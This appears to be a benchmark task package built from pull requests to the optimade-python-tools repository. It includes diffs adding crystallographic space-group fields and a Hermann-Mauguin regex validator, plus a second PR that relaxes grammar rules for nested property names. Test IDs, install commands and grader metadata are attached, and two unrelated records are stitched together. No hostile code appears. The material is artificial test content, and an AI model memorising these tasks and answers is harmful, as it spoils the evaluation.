`null`. + - **Query**: Support for queries on this property is OPTIONAL. + - The integer value MUST be between 1 and 230. 
+ - MUST be null if `nperiodic_dimensions` is not equal to 3.""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, + ge=1, + le=230, + ), + ] = None + cartesian_site_positions: Annotated[ list[Vector3D] | None, OptimadeField( diff --git a/optimade/models/utils.py b/optimade/models/utils.py index 75ad8eb4..e14eb2c8 100644 --- a/optimade/models/utils.py +++ b/optimade/models/utils.py @@ -234,6 +234,18 @@ ANONYMOUS_ELEMENTS = tuple(itertools.islice(anonymous_element_generator(), 150)) CHEMICAL_FORMULA_REGEXP = r"(^$)|^([A-Z][a-z]?([2-9]|[1-9]\d+)?)+$" SYMMETRY_OPERATION_REGEXP = r"^([-+]?[xyz]([-+][xyz])?([-+](1/2|[12]/3|[1-3]/4|[1-5]/6))?|[-+]?(1/2|[12]/3|[1-3]/4|[1-5]/6)([-+][xyz]([-+][xyz])?)?),([-+]?[xyz]([-+][xyz])?([-+](1/2|[12]/3|[1-3]/4|[1-5]/6))?|[-+]?(1/2|[12]/3|[1-3]/4|[1-5]/6)([-+][xyz]([-+][xyz])?)?),([-+]?[xyz]([-+][xyz])?([-+](1/2|[12]/3|[1-3]/4|[1-5]/6))?|[-+]?(1/2|[12]/3|[1-3]/4|[1-5]/6)([-+][xyz]([-+][xyz])?)?)$" +HM_SYMBOL_REGEXP = r"^(P|I|F|A|B|C|R)(\s+\d+|\s+[a-z]+|\s+\d+/[a-z]+|\s+\d+/\d+|\s+-\d*|\s+\d+/m|\s+[a-z]+/m)*$" + + +def _generate_symmetry_operation_regex(): + translation = "1/2|[12]/3|[1-3]/4|[1-5]/6" + translation_appended = f"[-+]? [xyz] ([-+][xyz])? ([-+] ({translation}) )?" + translation_prepended = f"[-+]? ({translation}) ([-+] [xyz] ([-+][xyz])? )?" + symop = f"({translation_appended}|{translation_prepended})".replace(" ", "") + return f"^{symop},{symop},{symop}$" + + +SPACE_GROUP_SYMMETRY_OPERATION_REGEX = _generate_symmetry_operation_regex() EXTRA_SYMBOLS = ["X", "vacancy"]
Add remaining symmetry group fields (Hall, HM symbols, IT number) Finishes the remaining work migrating #1422.
**Title** Add optional symmetry‑group metadata (Hall, Hermann‑Mauguin, extended H‑M, and IT number) to the Structures model and OpenAPI definition **Problem** The Structures endpoint did not expose standard crystallographic symmetry descriptors, preventing clients from accessing Hall symbols, Hermann‑Mauguin symbols (short and extended) and the International Tables group number. **Root Cause** The OpenAPI schema and the Pydantic model lacked definitions for these fields, and the utility module did not provide a regular‑expression validator for Hermann‑Mauguin symbols. **Fix / Expected Behavior** - Introduce four new optional fields representing Hall symbol, short H‑M symbol, extended H‑M symbol, and IT group number. - Mark each field as optional and queryable at the OPTIONAL support level. - Enforce pattern validation for H‑M symbols via a shared regular expression. - Constrain the IT number to the range 1–230 and make it nullable when the structure is not three‑dimensional. - Update the OpenAPI specification to include the new properties with full descriptions, examples, and bibliographic references. **Risk & Validation** - Because the new fields are optional, existing clients remain functional, but downstream tools must handle the additional keys gracefully. - Run the full test suite, including schema validation tests, to verify that serialization and deserialization accept both valid values and `null`. - Manually inspect the generated OpenAPI JSON to confirm that the new properties appear with correct metadata and constraints.
2,240
Materials-Consortia/optimade-python-tools
diff --git a/tests/adapters/structures/test_structures.py b/tests/adapters/structures/test_structures.py index 2e9fd5c5..7e1882bb 100644 --- a/tests/adapters/structures/test_structures.py +++ b/tests/adapters/structures/test_structures.py @@ -192,6 +192,10 @@ def compare_lossy_conversion( "species", "fractional_site_positions", "space_group_symmetry_operations_xyz", + "space_group_symbol_hall", + "space_group_symbol_hermann_mauguin", + "space_group_symbol_hermann_mauguin_extended", + "space_group_it_number", ) array_keys = ("cartesian_site_positions", "lattice_vectors") diff --git a/tests/models/test_data/test_good_structures.json b/tests/models/test_data/test_good_structures.json index c06a32dc..562ef906 100644 --- a/tests/models/test_data/test_good_structures.json +++ b/tests/models/test_data/test_good_structures.json @@ -191,7 +191,10 @@ {"name": "P", "chemical_symbols": ["P"], "concentration": [1.0] } ], "structure_features": ["site_attachments"], - "space_group_symmetry_operations_xyz": ["x,y,z", "-x,y,-z", "x+1/2,y+1/2,z", "-x+1/2,y+1/2,-z"] + "space_group_symmetry_operations_xyz": ["x,y,z", "-x,y,-z", "x+1/2,y+1/2,z", "-x+1/2,y+1/2,-z"], + "space_group_symbol_hermann_mauguin": "R -3 m", + "space_group_symbol_hermann_mauguin_extended": "R -3 m", + "space_group_symbol_hall": "I 4bd 2ab 3" }, { "task_id": "db/1234567", @@ -224,6 +227,10 @@ {"name": "P", "chemical_symbols": ["P"], "concentration": [1.0] } ], "structure_features": ["disorder", "site_attachments"], - "space_group_symmetry_operations_xyz": ["x,y,z"] + "space_group_symmetry_operations_xyz": ["x,y,z"], + "space_group_symbol_hall": "P 2yb (-1/2*x+z,1/2*x,y)", + "space_group_symbol_hermann_mauguin": "P 1", + "space_group_symbol_hermann_mauguin_extended": "P 1", + "space_group_it_number": 122 } ] diff --git a/tests/models/test_structures.py b/tests/models/test_structures.py index bafee17d..2591b06a 100644 --- a/tests/models/test_structures.py +++ b/tests/models/test_structures.py @@ -211,6 +211,10 @@ 
deformities = ( {"space_group_symmetry_operations_xyz": ["xy,z"]}, "String should match pattern", ), + ( + {"space_group_symbol_hermann_mauguin": "P1"}, + "String should match pattern", + ), ) diff --git a/tests/models/test_utils.py b/tests/models/test_utils.py index ff13cf90..267f3780 100644 --- a/tests/models/test_utils.py +++ b/tests/models/test_utils.py @@ -1,9 +1,15 @@ +import re from collections.abc import Callable import pytest from pydantic import BaseModel, Field, ValidationError -from optimade.models.utils import OptimadeField, StrictField, SupportLevel +from optimade.models.utils import ( + HM_SYMBOL_REGEXP, + OptimadeField, + StrictField, + SupportLevel, +) def make_bad_models(field: Callable): @@ -159,3 +165,58 @@ def test_anonymize_formula(): assert anonymize_formula("Si1 O2") == "A2B" assert anonymize_formula("Si11 O2") == "A11B2" assert anonymize_formula("Si10 O2C4") == "A5B2C" + + +VALID_HM_SYMBOLS = [ + "P 1", # Triclinic + "P -1", + "P 2", # Monoclinic + "P 21", + "P m", + "P c", + "P 2/m", + "P 21/c", + "P 21/n", + "C 2/c", + "P 2 2 2", # Orthorhombic + "P 21 21 21", + "P n n n", + "P m m a", + "F d d d", + "I m m a", + "P 4", # Tetragonal + "P 41", + "P 42", + "P 43", + "I 4/m m m", + "P 3", # Trigonal + "R 3", + "P 31", + "R -3 m", + "P 6", # Hexagonal + "P 63/m m c", + "P m -3", # Cubic + "F m -3 m", + "I a -3 d", +] + +INVALID_HM_SYMBOLS = [ + "", # Empty string + "p 1", # Lowercase lattice + "Q 1", # Invalid lattice + "P1", # No space + "1 P", # Wrong order + "P 2/c/m", # Invalid combination + "PP 2", # Double letter + "X -3 m", # Invalid lattice +] + + +@pytest.mark.parametrize("hm_symbol", VALID_HM_SYMBOLS) +def test_hm_symbol_regexp(hm_symbol): + assert re.match(HM_SYMBOL_REGEXP, hm_symbol) + + +@pytest.mark.parametrize("hm_symbol", INVALID_HM_SYMBOLS) +def test_invalid_space_groups(hm_symbol): + assert re.match(HM_SYMBOL_REGEXP, hm_symbol) is None diff --git a/tests/server/test_client.py b/tests/server/test_client.py index 
3e02ca41..796cb1a7 100644 --- a/tests/server/test_client.py +++ b/tests/server/test_client.py @@ -509,7 +509,7 @@ def test_list_properties( results = cli.list_properties("structures") for database in results: - assert len(results[database]) == 23, str(results[database]) + assert len(results[database]) == 27, str(results[database]) results = cli.search_property("structures", "site") for database in results:
[ "tests/adapters/structures/test_structures.py::test_instantiate", "tests/adapters/structures/test_structures.py::test_setting_entry", "tests/adapters/structures/test_structures.py::test_convert_wrong_format", "tests/adapters/structures/test_structures.py::test_getattr_order", "tests/adapters/structures/test_structures.py::test_no_module_conversion", "tests/adapters/structures/test_structures.py::test_common_converters", "tests/adapters/structures/test_structures.py::test_two_way_conversion[pymatgen]", "tests/adapters/structures/test_structures.py::test_two_way_conversion[ase]", "tests/adapters/structures/test_structures.py::test_two_way_conversion_with_implicit_type[pymatgen]", "tests/adapters/structures/test_structures.py::test_two_way_conversion_with_implicit_type[ase]", "tests/adapters/structures/test_structures.py::test_load_good_structure_from_url", "tests/adapters/structures/test_structures.py::test_load_bad_structure_from_url", "tests/models/test_structures.py::test_good_structure_with_missing_data", "tests/models/test_structures.py::test_more_good_structures", "tests/models/test_structures.py::test_bad_structures", "tests/models/test_structures.py::test_structure_fatal_deformities[None]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity1]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity2]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity3]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity4]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity5]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity6]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity7]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity8]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity9]", 
"tests/models/test_structures.py::test_structure_fatal_deformities[deformity10]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity11]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity12]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity13]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity14]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity15]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity16]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity17]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity18]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity19]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity20]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity21]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity22]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity23]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity24]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity25]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity26]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity27]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity28]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity29]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity30]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity0]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity1]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity2]", 
"tests/models/test_structures.py::test_structure_minor_deformities[deformity3]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity4]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity5]", "tests/models/test_utils.py::test_strict_field", "tests/models/test_utils.py::test_optimade_field", "tests/models/test_utils.py::test_compatible_strict_optimade_field", "tests/models/test_utils.py::test_formula_regexp", "tests/models/test_utils.py::test_reduce_formula", "tests/models/test_utils.py::test_anonymize_formula", "tests/models/test_utils.py::test_hm_symbol_regexp[P", "tests/models/test_utils.py::test_hm_symbol_regexp[C", "tests/models/test_utils.py::test_hm_symbol_regexp[F", "tests/models/test_utils.py::test_hm_symbol_regexp[I", "tests/models/test_utils.py::test_hm_symbol_regexp[R", "tests/models/test_utils.py::test_invalid_space_groups[]", "tests/models/test_utils.py::test_invalid_space_groups[p", "tests/models/test_utils.py::test_invalid_space_groups[Q", "tests/models/test_utils.py::test_invalid_space_groups[P1]", "tests/models/test_utils.py::test_invalid_space_groups[1", "tests/models/test_utils.py::test_invalid_space_groups[P", "tests/models/test_utils.py::test_invalid_space_groups[PP", "tests/models/test_utils.py::test_invalid_space_groups[X", "tests/server/test_client.py::test_client_endpoints[False]", "tests/server/test_client.py::test_client_endpoints[True]", "tests/server/test_client.py::test_filter_validation[True]", "tests/server/test_client.py::test_filter_validation[False]", "tests/server/test_client.py::test_client_response_fields[True]", "tests/server/test_client.py::test_client_response_fields[False]", "tests/server/test_client.py::test_multiple_base_urls[True]", "tests/server/test_client.py::test_multiple_base_urls[False]", "tests/server/test_client.py::test_include_exclude_providers[True]", "tests/server/test_client.py::test_include_exclude_providers[False]", 
"tests/server/test_client.py::test_client_sort[True]", "tests/server/test_client.py::test_client_sort[False]", "tests/server/test_client.py::test_command_line_client[True]", "tests/server/test_client.py::test_command_line_client[False]", "tests/server/test_client.py::test_command_line_client_silent[True]", "tests/server/test_client.py::test_command_line_client_silent[False]", "tests/server/test_client.py::test_command_line_client_multi_provider[True]", "tests/server/test_client.py::test_command_line_client_multi_provider[False]", "tests/server/test_client.py::test_command_line_client_write_to_file[True]", "tests/server/test_client.py::test_command_line_client_write_to_file[False]", "tests/server/test_client.py::test_strict_async[True]", "tests/server/test_client.py::test_strict_async[False]", "tests/server/test_client.py::test_client_global_data_callback[True]", "tests/server/test_client.py::test_client_global_data_callback[False]", "tests/server/test_client.py::test_client_page_skip_callback[True]", "tests/server/test_client.py::test_client_page_skip_callback[False]", "tests/server/test_client.py::test_client_mutable_data_callback[True]", "tests/server/test_client.py::test_client_mutable_data_callback[False]", "tests/server/test_client.py::test_client_asynchronous_write_callback[True]", "tests/server/test_client.py::test_client_asynchronous_write_callback[False]", "tests/server/test_client.py::test_list_properties[True]", "tests/server/test_client.py::test_list_properties[False]", "tests/server/test_client.py::test_binary_search_internals[1_0]", "tests/server/test_client.py::test_binary_search_internals[2_0]", "tests/server/test_client.py::test_binary_search_internals[1_1]", "tests/server/test_client.py::test_binary_search_internals[1_2]", "tests/server/test_client.py::test_binary_search_internals[1_3]", "tests/server/test_client.py::test_binary_search_internals[2_1]", "tests/server/test_client.py::test_binary_search_internals[2_2]", 
"tests/server/test_client.py::test_binary_search_internals[3]", "tests/server/test_client.py::test_binary_search_internals[4]", "tests/server/test_client.py::test_binary_search_internals[5]", "tests/server/test_client.py::test_binary_search_internals[6]", "tests/server/test_client.py::test_binary_search_internals[7]", "tests/server/test_client.py::test_binary_search_internals[9]", "tests/server/test_client.py::test_binary_search_internals[12]", "tests/server/test_client.py::test_binary_search_internals[14]", "tests/server/test_client.py::test_binary_search_internals[18]", "tests/server/test_client.py::test_binary_search_internals[22]", "tests/server/test_client.py::test_binary_search_internals[27]", "tests/server/test_client.py::test_binary_search_internals[33]", "tests/server/test_client.py::test_binary_search_internals[41]", "tests/server/test_client.py::test_binary_search_internals[51]", "tests/server/test_client.py::test_binary_search_internals[63]", "tests/server/test_client.py::test_binary_search_internals[77]", "tests/server/test_client.py::test_binary_search_internals[95]", "tests/server/test_client.py::test_binary_search_internals[117]", "tests/server/test_client.py::test_binary_search_internals[144]", "tests/server/test_client.py::test_binary_search_internals[177]", "tests/server/test_client.py::test_binary_search_internals[218]", "tests/server/test_client.py::test_binary_search_internals[269]", "tests/server/test_client.py::test_binary_search_internals[331]", "tests/server/test_client.py::test_binary_search_internals[407]", "tests/server/test_client.py::test_binary_search_internals[501]", "tests/server/test_client.py::test_binary_search_internals[616]", "tests/server/test_client.py::test_binary_search_internals[758]", "tests/server/test_client.py::test_binary_search_internals[933]", "tests/server/test_client.py::test_binary_search_internals[1148]", "tests/server/test_client.py::test_binary_search_internals[1412]", 
"tests/server/test_client.py::test_binary_search_internals[1737]", "tests/server/test_client.py::test_binary_search_internals[2137]", "tests/server/test_client.py::test_binary_search_internals[2630]", "tests/server/test_client.py::test_binary_search_internals[3235]", "tests/server/test_client.py::test_binary_search_internals[3981]", "tests/server/test_client.py::test_binary_search_internals[4897]", "tests/server/test_client.py::test_binary_search_internals[6025]", "tests/server/test_client.py::test_binary_search_internals[7413]", "tests/server/test_client.py::test_binary_search_internals[9120]", "tests/server/test_client.py::test_binary_search_internals[11220]", "tests/server/test_client.py::test_binary_search_internals[13803]", "tests/server/test_client.py::test_binary_search_internals[16982]", "tests/server/test_client.py::test_binary_search_internals[20892]", "tests/server/test_client.py::test_binary_search_internals[25703]", "tests/server/test_client.py::test_binary_search_internals[31622]", "tests/server/test_client.py::test_binary_search_internals[38904]", "tests/server/test_client.py::test_binary_search_internals[47863]", "tests/server/test_client.py::test_binary_search_internals[58884]", "tests/server/test_client.py::test_binary_search_internals[72443]", "tests/server/test_client.py::test_binary_search_internals[89125]", "tests/server/test_client.py::test_binary_search_internals[109647]", "tests/server/test_client.py::test_binary_search_internals[134896]", "tests/server/test_client.py::test_binary_search_internals[165958]", "tests/server/test_client.py::test_binary_search_internals[204173]", "tests/server/test_client.py::test_binary_search_internals[251188]", "tests/server/test_client.py::test_binary_search_internals[309029]", "tests/server/test_client.py::test_binary_search_internals[380189]", "tests/server/test_client.py::test_binary_search_internals[467735]", "tests/server/test_client.py::test_binary_search_internals[575439]", 
"tests/server/test_client.py::test_binary_search_internals[707945]", "tests/server/test_client.py::test_binary_search_internals[870963]", "tests/server/test_client.py::test_binary_search_internals[1071519]", "tests/server/test_client.py::test_binary_search_internals[1318256]", "tests/server/test_client.py::test_binary_search_internals[1621810]", "tests/server/test_client.py::test_binary_search_internals[1995262]", "tests/server/test_client.py::test_binary_search_internals[2454708]", "tests/server/test_client.py::test_binary_search_internals[3019951]", "tests/server/test_client.py::test_binary_search_internals[3715352]", "tests/server/test_client.py::test_binary_search_internals[4570881]", "tests/server/test_client.py::test_binary_search_internals[5623413]", "tests/server/test_client.py::test_binary_search_internals[6918309]", "tests/server/test_client.py::test_binary_search_internals[8511380]", "tests/server/test_client.py::test_binary_search_internals[10471285]", "tests/server/test_client.py::test_binary_search_internals[12882495]", "tests/server/test_client.py::test_binary_search_internals[15848931]", "tests/server/test_client.py::test_binary_search_internals[19498445]", "tests/server/test_client.py::test_binary_search_internals[23988329]", "tests/server/test_client.py::test_binary_search_internals[29512092]", "tests/server/test_client.py::test_binary_search_internals[36307805]", "tests/server/test_client.py::test_binary_search_internals[44668359]", "tests/server/test_client.py::test_binary_search_internals[54954087]", "tests/server/test_client.py::test_binary_search_internals[67608297]", "tests/server/test_client.py::test_binary_search_internals[83176377]", "tests/server/test_client.py::test_binary_search_internals[102329299]", "tests/server/test_client.py::test_binary_search_internals[125892541]", "tests/server/test_client.py::test_binary_search_internals[154881661]", "tests/server/test_client.py::test_binary_search_internals[190546071]", 
"tests/server/test_client.py::test_binary_search_internals[234422881]", "tests/server/test_client.py::test_binary_search_internals[288403150]", "tests/server/test_client.py::test_binary_search_internals[354813389]", "tests/server/test_client.py::test_binary_search_internals[436515832]", "tests/server/test_client.py::test_binary_search_internals[537031796]", "tests/server/test_client.py::test_binary_search_internals[660693448]", "tests/server/test_client.py::test_binary_search_internals[812830516]", "tests/server/test_client.py::test_binary_search_internals[1000000000]", "tests/server/test_client.py::test_raw_get_one_sync", "tests/server/test_client.py::test_raw_get_one_async" ]
[]
No new interfaces are introduced.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/adapters/structures/test_structures.py tests/models/test_structures.py tests/models/test_utils.py tests/server/test_client.py" }
{ "num_modified_files": 3, "num_modified_lines": 188, "pr_author": "ml-evs", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding Hall, Hermann‑Mauguin, extended Hermann‑Mauguin symbols and the IT number to the structure model. The test changes check that these fields appear in model conversion, in example JSON data, and that the Hermann‑Mauguin regex validates correct/incorrect symbols. The tests directly reflect the stated requirement, with no hidden expectations or external dependencies, so the problem is well‑specified and solvable. No B‑category signals are present.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, 
"test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
0be0c7f0e627652eb6b98ce7cdf83f2f3881843e
2025-03-08 16:57:19
ml-evs: pre-commit.ci autofix ml-evs: pre-commit.ci autofix codecov[bot]: ## [Codecov](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2242?dropdown=coverage&src=pr&el=h1&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) Report All modified and coverable lines are covered by tests :white_check_mark: > Project coverage is 90.60%. Comparing base [(`0be0c7f`)](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/0be0c7f0e627652eb6b98ce7cdf83f2f3881843e?dropdown=coverage&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) to head [(`4f11c24`)](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/4f11c24d3ef56d5019cad31b1040b8b6ca38d899?dropdown=coverage&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). <details><summary>Additional details and impacted files</summary> ```diff @@ Coverage Diff @@ ## main #2242 +/- ## ======================================= Coverage 90.60% 90.60% ======================================= Files 75 75 Lines 4929 4929 ======================================= Hits 4466 4466 Misses 463 463 ``` | [Flag](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2242/flags?src=pr&el=flags&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | Coverage Δ | | |---|---|---| | [project](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2242/flags?src=pr&el=flag&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | `90.60% <ø> (ø)` | | | 
[validator](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2242/flags?src=pr&el=flag&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | `90.60% <ø> (ø)` | | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#carryforward-flags-in-the-pull-request-comment) to find out more. </details> [:umbrella: View full report in Codecov by Sentry](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2242?dropdown=coverage&src=pr&el=continue&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). :loudspeaker: Have feedback on the report? [Share it here](https://about.codecov.io/codecov-pr-comment-feedback/?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). <details><summary>🚀 New features to boost your workflow: </summary> - ❄ [Test Analytics](https://docs.codecov.com/docs/test-analytics): Detect flaky tests, report on failures, and find test suite problems. </details> ml-evs: pre-commit.ci autofix
materials-consortia__optimade-python-tools-2242
diff --git a/optimade/grammar/v1.2.0.develop.lark b/optimade/grammar/v1.2.0.lark similarity index 96% rename from optimade/grammar/v1.2.0.develop.lark rename to optimade/grammar/v1.2.0.lark index 12ec22c0..6d803090 100644 --- a/optimade/grammar/v1.2.0.develop.lark +++ b/optimade/grammar/v1.2.0.lark @@ -55,7 +55,7 @@ set_zip_op_rhs: property_zip_addon HAS ( value_zip | ONLY value_zip_list | ALL v property_zip_addon: ":" property (":" property)* // Property syntax -property: IDENTIFIER ( "." IDENTIFIER )* +property: IDENTIFIER ( "." NESTED_IDENTIFIER )* // String syntax string: ESCAPED_STRING @@ -95,6 +95,7 @@ ANY: "ANY" OPERATOR: ( "<" ["="] | ">" ["="] | ["!"] "=" ) IDENTIFIER: ( "_" | LCASE_LETTER ) ( "_" | LCASE_LETTER | DIGIT )* +NESTED_IDENTIFIER: ( "_" | LCASE_LETTER ) ( "_" | "+" | LCASE_LETTER | DIGIT )* LCASE_LETTER: "a".."z" DIGIT: "0".."9" diff --git a/optimade/server/routers/utils.py b/optimade/server/routers/utils.py index b2f16186..a6687d5c 100644 --- a/optimade/server/routers/utils.py +++ b/optimade/server/routers/utils.py @@ -166,6 +166,10 @@ def get_included_relationships( ) endpoint_includes: dict[Any, dict] = defaultdict(dict) + + if not include_param: + return [] + for doc in results: # convert list of references into dict by ID to only included unique IDs if doc is None:
Use 1.2 grammar by default and relax rules on nested fields This PR simply removes the "develop" tag from the v1.2.0 grammar, which should make it the default. It also allows nested field names to have more flexibility, inspired by e.g., the MP field `_mp_stability.gga_gga+u_r2scan` (#2182). The spec reads that dictionary keys must only be strings, not identifiers, so I have relaxed our previous approach of enforcing an identifier to allow for filtering on such fields. I'll do a bit of testing to make sure that this is still URL-safe, but I think we should be fine.
**Title** Default to v1.2 grammar and relax nested property token rules; guard include handling **Problem** The library defaults to an older grammar version and enforces overly strict rules on nested property names, rejecting valid dictionary keys such as those containing “+”. Additionally, the relationship‑inclusion helper processes requests even when no include parameter is supplied, leading to unnecessary work and potential errors. **Root Cause** The v1.2 grammar was marked as a development version and its property rule limited nested segments to simple identifiers. The inclusion utility lacked an early‑exit condition for missing include parameters. **Fix / Expected Behavior** - v1.2 grammar is now the default parsing grammar. - Property token definition accepts a broader set of characters for nested segments, matching the specification that dictionary keys are arbitrary strings. - The inclusion helper immediately returns an empty list when the include parameter is absent. - All existing API endpoints continue to operate correctly with the updated grammar and inclusion logic. **Risk & Validation** - Verify that relaxed nested identifiers remain URL‑safe and do not break existing query parsing. - Run the full test suite, including cases that filter on nested fields and calls without include parameters. - Confirm that downstream components that rely on include processing handle an empty list gracefully.
2,242
Materials-Consortia/optimade-python-tools
diff --git a/optimade/server/data/test_data.jsonl b/optimade/server/data/test_data.jsonl index 2872b2f2..f1f58619 100644 --- a/optimade/server/data/test_data.jsonl +++ b/optimade/server/data/test_data.jsonl @@ -14,7 +14,7 @@ {"type": "structures", "id": "mpf_3", "attributes": {"immutable_id": "5cfb441f053b174410700d04", "assemblies": null, "chemsys": "Ac-Ag-Pb", "cartesian_site_positions": [[0.6522459815095935, 0.6522459815095935, 0.6522459815095935], [0.6522459815095935, 0.6522459815095935, 0.6522459815095935], [0.6522459815095935, 0.6522459815095935, 0.6522459815095935], [0.6522459815095935, 0.6522459815095935, 0.6522459815095935]], "dimension_types": [1, 1, 1], "nperiodic_dimensions": 3, "elements": ["Ac", "Ag", "Pb"], "elements_ratios": [0.5, 0.25, 0.25], "formula_anonymous": "A2BC", "last_modified": {"$date": "2019-06-08T05:13:37.331Z"}, "lattice_vectors": [[7.698325441636717, 0, 0], [0, 3.9419030762941096, 0], [0, 0, 0.5746646140691603]], "nelements": 3, "nsites": 4, "pretty_formula": "Ac2AgPb", "species": [{"chemical_symbols": ["Ac"], "concentration": [1.0], "name": "Ac1"}, {"chemical_symbols": ["Ac"], "concentration": [1.0], "name": "Ac2"}, {"chemical_symbols": ["Ag"], "concentration": [1.0], "name": "Ag"}, {"chemical_symbols": ["Pb"], "concentration": [1.0], "name": "Pb"}], "species_at_sites": ["Ac1", "Ac2", "Ag", "Pb"], "structure_features": [], "task_id": "mpf_3", "relationships": {"references": {"data": [{"type": "references", "id": "maddox1988"}]}}, "_exmpl_this_provider_field": "test"}} {"type": "structures", "id": "mpf_30", "attributes": {"immutable_id": "5cfb441f053b174410700d1f", "assemblies": null, "chemsys": "Ac-O", "cartesian_site_positions": [[0.15817967032742697, 0.15817967032742697, 0.15817967032742697], [0.15817967032742697, 0.15817967032742697, 0.15817967032742697], [0.15817967032742697, 0.15817967032742697, 0.15817967032742697], [0.15817967032742697, 0.15817967032742697, 0.15817967032742697], [0.15817967032742697, 0.15817967032742697, 
0.15817967032742697]], "dimension_types": [1, 1, 1], "nperiodic_dimensions": 3, "elements": ["Ac", "O"], "elements_ratios": [0.4, 0.6], "formula_anonymous": "A3B2", "last_modified": {"$date": "2019-06-08T05:13:37.337Z"}, "lattice_vectors": [[5.270508031864836, 0, 0], [0, 7.390955992107494, 0], [0, 0, 3.0995955580253574]], "nelements": 2, "nsites": 5, "pretty_formula": "Ac2O3", "species": [{"chemical_symbols": ["Ac"], "concentration": [1.0], "name": "Ac"}, {"chemical_symbols": ["O"], "concentration": [1.0], "name": "O"}], "species_at_sites": ["Ac", "Ac", "O", "O", "O"], "structure_features": [], "task_id": "mpf_30", "_exmpl_this_provider_field": "test"}} {"type": "structures", "id": "mpf_3803", "attributes": {"immutable_id": "5cfb441f053b174410701bdc", "assemblies": null, "chemsys": "Ba-Ce-Fe-H-Na-O-Si-Ti", "cartesian_site_positions": [[0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 